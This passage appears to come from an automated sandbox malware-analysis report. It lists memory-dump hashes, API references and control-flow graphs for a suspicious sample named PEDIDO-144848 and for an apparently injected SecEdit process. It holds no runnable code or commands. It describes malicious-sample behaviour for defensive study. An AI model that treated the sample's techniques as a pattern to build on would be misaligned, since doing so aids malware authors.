                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-161242083
                                                        • Opcode ID: 89e06d85d50aa80f916685de458877e20ac993a413e8f615d0d3189f45573c58
                                                        • Instruction ID: 3efc209457495e4f44e24ee358826882a09f689136593eb775e63f0d8ab31561
                                                        • Opcode Fuzzy Hash: 89e06d85d50aa80f916685de458877e20ac993a413e8f615d0d3189f45573c58
                                                        • Instruction Fuzzy Hash: 6271DD75E006059FEF14DF6AC980AAEB7F1EF48608F18406EE905EB351E734A942CB95
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c4f8c8a890ab5ee843ed49d73d3ed203c94fa2f422e3de4fb4dd0675469bdff1
                                                        • Instruction ID: 37646f212d650d64d495bbbcb9432a953b92406896992b43433e4e191aa6a339
                                                        • Opcode Fuzzy Hash: c4f8c8a890ab5ee843ed49d73d3ed203c94fa2f422e3de4fb4dd0675469bdff1
                                                        • Instruction Fuzzy Hash: 59E1E0B5D00718CFEF25CFAAD980A8DBBF5BF48304F24452AE955A7260DB70A881CF50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: ab42e56232eda1e3b5be94fba4320e2cd072bf05ca7c22c6b30758f7fc571729
                                                        • Instruction ID: d3690f818b9591c26d9b0d0db491407fd3c441080a4dde27c9df451a2ee2e029
                                                        • Opcode Fuzzy Hash: ab42e56232eda1e3b5be94fba4320e2cd072bf05ca7c22c6b30758f7fc571729
                                                        • Instruction Fuzzy Hash: 91515D75B10662DFEB08CE9AC890A19B7E5FF89394B24416DD606DB710DBB1FC41CB80
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                        • String ID:
                                                        • API String ID: 4281723722-0
                                                        • Opcode ID: b3b49daf2ee7b5eee842b575af4792a721db517fae30dc364c5cafb9ae01e9c2
                                                        • Instruction ID: 9a57c86338d8cf8375914aeeada54e1536e39ad9e2eece40aeaa0644b5e7ccb8
                                                        • Opcode Fuzzy Hash: b3b49daf2ee7b5eee842b575af4792a721db517fae30dc364c5cafb9ae01e9c2
                                                        • Instruction Fuzzy Hash: CC31E275E016689FCF05DFA9D844A9DBBB1FB48320F10816AE611FB390DB359901CFA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: aa9ec42df9498ce8a945a8f8977c5c8d3fc9af61753f2915d25bc7cfa6521180
                                                        • Instruction ID: 6a2b600cd92d06319b5467abb58c6f9ceb5a2a1e5a84b79de7b6c81520c02cfc
                                                        • Opcode Fuzzy Hash: aa9ec42df9498ce8a945a8f8977c5c8d3fc9af61753f2915d25bc7cfa6521180
                                                        • Instruction Fuzzy Hash: EA3259B4D04769DFEB21CF65CA84BD9BBB4BF08308F5040EAD549A7242DB749A84CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: 401867ee89658cb643de28daa8fe82de6eeeb4058e4c6c8d99808c6c1762b957
                                                        • Instruction ID: 8bf1c6d7cac13536d40531bd42d01aed028ad92142975aa817888478cf1fb161
                                                        • Opcode Fuzzy Hash: 401867ee89658cb643de28daa8fe82de6eeeb4058e4c6c8d99808c6c1762b957
                                                        • Instruction Fuzzy Hash: 7151ACB1E126588FEB24DF95D884689FBF5EF40398F24C02DD009DB250EB74D98ACB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 005c26ba5a785dd157b39ebe8884f3a548e33001d068c8407003647724426368
                                                        • Instruction ID: b7c7ab86406c14099380f3eda52e8fa72583b93ec75e6a7825afbafa4e3b3a47
                                                        • Opcode Fuzzy Hash: 005c26ba5a785dd157b39ebe8884f3a548e33001d068c8407003647724426368
                                                        • Instruction Fuzzy Hash: DC418FB5A187119FD340CF29C444A5ABBE5FB88354F00492EF588DB310D772EA09CF96

                                                        Execution Graph

                                                        Execution Coverage:0.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:1
                                                        execution_graph 71646 30a2b20 71648 30a2b2a 71646->71648 71649 30a2b3f LdrInitializeThunk 71648->71649 71650 30a2b31 71648->71650 71651 2edeeba 71652 2edeeed 71651->71652 71653 2edf057 NtQueryInformationProcess 71652->71653 71654 2edf091 71652->71654 71653->71654 71659 30a29f0 LdrInitializeThunk

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2edeeba-2edeeeb 1 2edeeed-2edef04 call 2ee10d8 0->1 2 2edef09-2edef28 call 2ee10f8 call 2edcec8 0->2 1->2 8 2edef2e-2edf02e call 2ededf8 call 2ee10f8 call 2ee5064 call 2ed0398 call 2ee06b8 call 2ed0398 call 2ee06b8 call 2ee2dc8 2->8 9 2edf4e6-2edf4f1 2->9 26 2edf4da-2edf4e1 call 2ededf8 8->26 27 2edf034-2edf08c call 2ed0398 call 2ee06b8 NtQueryInformationProcess call 2ee10f8 8->27 26->9 34 2edf091-2edf0c2 call 2ed0398 call 2ee06b8 27->34 39 2edf0c4-2edf0d1 34->39 40 2edf0d6-2edf14c call 2ee5072 call 2ed0398 call 2ee06b8 34->40 39->26 40->39 49 2edf152-2edf164 call 2ee509c 40->49 52 2edf1b4-2edf1f4 call 2ed0398 call 2ee06b8 call 2ee3728 49->52 53 2edf166-2edf1af call 2ee1de8 49->53 63 2edf1f6-2edf20e 52->63 64 2edf213-2edf303 call 2ed0398 call 2ee06b8 call 2ee50aa call 2ed0398 call 2ee06b8 call 2ee30e8 call 2ee10a8 * 3 call 2ee509c 52->64 53->26 63->26 87 2edf305-2edf32e call 2ee509c call 2ee10a8 call 2ee50fe call 2ee50b8 64->87 88 2edf330-2edf345 call 2ee509c 64->88 99 2edf385-2edf38f 87->99 93 2edf36e-2edf380 call 2ee1d28 88->93 94 2edf347-2edf369 call 2ee2898 88->94 93->99 94->93 101 2edf395-2edf3df call 2ed0398 call 2ee06b8 call 2ee3408 call 2ee509c 99->101 102 2edf457-2edf4ba call 2ed0398 call 2ee06b8 call 2ee3a48 99->102 121 2edf414-2edf41b 101->121 122 2edf3e1-2edf40a call 2ee5148 call 2ee50fe 101->122 102->26 129 2edf4bc-2edf4d5 call 2ee10d8 102->129 124 2edf41d-2edf425 call 2ee509c 121->124 125 2edf427-2edf432 121->125 122->121 124->102 124->125 125->102 130 2edf434-2edf452 call 2ee3d68 125->130 129->26 130->102
                                                        APIs
                                                        • NtQueryInformationProcess.NTDLL ref: 02EDF076
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117102734713.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_2ed0000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID: 0
                                                        • API String ID: 1778838933-4108050209
                                                        • Opcode ID: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                        • Instruction ID: 5dd63ca70cf79b8d923e2a847cfb2725d476408837c876ba8c2efd57441744db
                                                        • Opcode Fuzzy Hash: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                        • Instruction Fuzzy Hash: A6023A70558A8C8FCFA5EF68C894AEE77E2FB95304F50961AE84AC7240DF34D645CB41

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 152 30a34e0-30a34ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 142 30a2b00-30a2b0c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 143 30a2b10-30a2b1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 144 30a2b80-30a2b8c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 145 30a2b90-30a2b9c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 146 30a2bc0-30a2bcc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 141 30a2a80-30a2a8c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 140 30a29f0-30a29fc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 30a2f00-30a2f0c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 150 30a2e50-30a2e5c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 149 30a2d10-30a2d1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 147 30a2c30-30a2c3c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 148 30a2cf0-30a2cfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 136 30a2b2a-30a2b2f 137 30a2b3f-30a2b46 LdrInitializeThunk 136->137 138 30a2b31-30a2b38 136->138
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117098986422.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_550000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Strings
                                                        • ExecuteOptions, xrefs: 030D44AB
                                                        • Execute=1, xrefs: 030D451E
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 030D4592
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030D4530
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030D4460
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030D454D
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030D4507
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280